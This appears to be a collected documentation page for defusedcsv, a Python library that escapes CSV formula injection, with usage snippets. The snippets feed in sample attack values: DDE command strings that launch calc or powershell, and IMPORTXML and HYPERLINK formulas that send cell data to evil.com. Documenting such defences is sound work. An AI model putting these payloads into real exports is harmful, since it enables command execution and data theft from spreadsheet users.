### Writing Sanitized CSV Rows with DefusedCSV Source: https://context7.com/raphaelm/defusedcsv/llms.txt Demonstrates how to use the library to write dictionary-based rows to a CSV. Malicious payloads starting with dangerous characters are automatically escaped to prevent spreadsheet execution. ```python writer.writerow({ 'username': 'alice', 'email': 'alice@example.com', 'bio': 'Software developer' }) writer.writerow({ 'username': 'mallory', 'email': 'mallory@example.com', 'bio': '=cmd|\' /C calc\'!A0' }) ``` -------------------------------- ### Write single rows with automatic escaping Source: https://context7.com/raphaelm/defusedcsv/llms.txt Uses the writerow method to write individual rows to a CSV. It automatically applies escaping to fields starting with dangerous characters while preserving valid numeric data. ```python from io import StringIO from defusedcsv import csv output = StringIO() writer = csv.writer(output) # Safe data passes through unchanged writer.writerow(['Product', 'Price', 'Quantity']) writer.writerow(['Widget', '19.99', '100']) # Dangerous payloads are automatically escaped writer.writerow(['Gadget', '+1+1', '50']) writer.writerow(['Tool', '|formula', '25']) writer.writerow(['Part', '%macro', '75']) # Numeric strings that look like formulas but are valid numbers are preserved writer.writerow(['Item', '-19.99', '10']) output.seek(0) print(output.read()) ``` -------------------------------- ### Create CSV writer with defusedcsv Source: https://context7.com/raphaelm/defusedcsv/llms.txt Demonstrates initializing a CSV writer using defusedcsv.csv.writer, which acts as a secure replacement for the standard library, automatically sanitizing dangerous payloads like formula injections. ```python from io import StringIO from defusedcsv import csv # Create a CSV writer with custom delimiter and quoting output = StringIO() writer = csv.writer(output, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL) # Write rows containing potentially dangerous payloads writer.writerow(['Name', 'Email', 'Notes']) writer.writerow(['Alice', 'alice@example.com', 'Regular user']) writer.writerow(['Bob', 'bob@example.com', '=SUM(A1:A10)']) writer.writerow(['Charlie', 'charlie@example.com', '@SUM(1+1)*cmd|' /C calc'!A0']) writer.writerow(['Dave', 'dave@example.com', '-2+3+cmd|' /C powershell'!A0']) output.seek(0) print(output.read()) ``` -------------------------------- ### Drop-in Replacement for Python CSV Module Source: https://context7.com/raphaelm/defusedcsv/llms.txt Shows the ease of integration by replacing the standard csv import. The library supports all standard features like DictReader, Sniffer, and dialect management while adding security. ```python from defusedcsv import csv with open('export.csv', 'w', newline='') as f: writer = csv.writer(f) writer.writerow(['Name', 'User Input']) writer.writerow(['User1', '=IMPORTXML("http://evil.com", "//a")']) ``` -------------------------------- ### Write dictionary-based CSV with DictWriter Source: https://context7.com/raphaelm/defusedcsv/llms.txt Implements the DictWriter class to map dictionary keys to CSV headers, maintaining the standard interface while enforcing security sanitization on all values. ```python from io import StringIO from defusedcsv import csv output = StringIO() fieldnames = ['username', 'email', 'bio'] writer = csv.DictWriter(output, fieldnames=fieldnames) # Write header row writer.writeheader() ``` -------------------------------- ### Replace standard csv module with defusedcsv Source: https://github.com/raphaelm/defusedcsv/blob/master/README.rst To use defusedcsv, replace the standard library import statement with the defusedcsv module. This provides a drop-in replacement that automatically sanitizes CSV cell content to prevent injection attacks. ```python from defusedcsv import csv # Use the csv module as you normally would with open('output.csv', 'w', newline='') as f: writer = csv.writer(f) writer.writerow(['=SUM(1+1)', 'normal data']) ``` -------------------------------- ### Batch write rows with writerows Source: https://context7.com/raphaelm/defusedcsv/llms.txt Efficiently writes multiple rows at once using writerows, ensuring all fields across the dataset are sanitized against injection attacks. ```python from io import StringIO from defusedcsv import csv output = StringIO() writer = csv.writer(output) # Batch write multiple rows with mixed safe and dangerous content rows = [ ['ID', 'Formula', 'Description'], [1, '=1+1', 'Addition formula'], [2, '-1+1', 'Subtraction attempt'], [3, '@A3', 'Cell reference'], [4, '=HYPERLINK("http://evil.com?data="&A1,"Click here")', 'Data exfiltration attempt'], [5, 'Safe content', 'No escaping needed'] ] writer.writerows(rows) output.seek(0) print(output.read()) ``` -------------------------------- ### Manual Sanitization with _escape Source: https://context7.com/raphaelm/defusedcsv/llms.txt Utilizes the internal _escape function to sanitize specific strings. It preserves safe data types like numbers and booleans while prefixing dangerous characters with a single quote. ```python from defusedcsv.csv import _escape print(_escape("=1+1")) # '=1+1 print(_escape("@A3")) # '@A3 print(_escape("=cmd|' /C calc'!A0")) # '=cmd\|' /C calc'!A0 ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.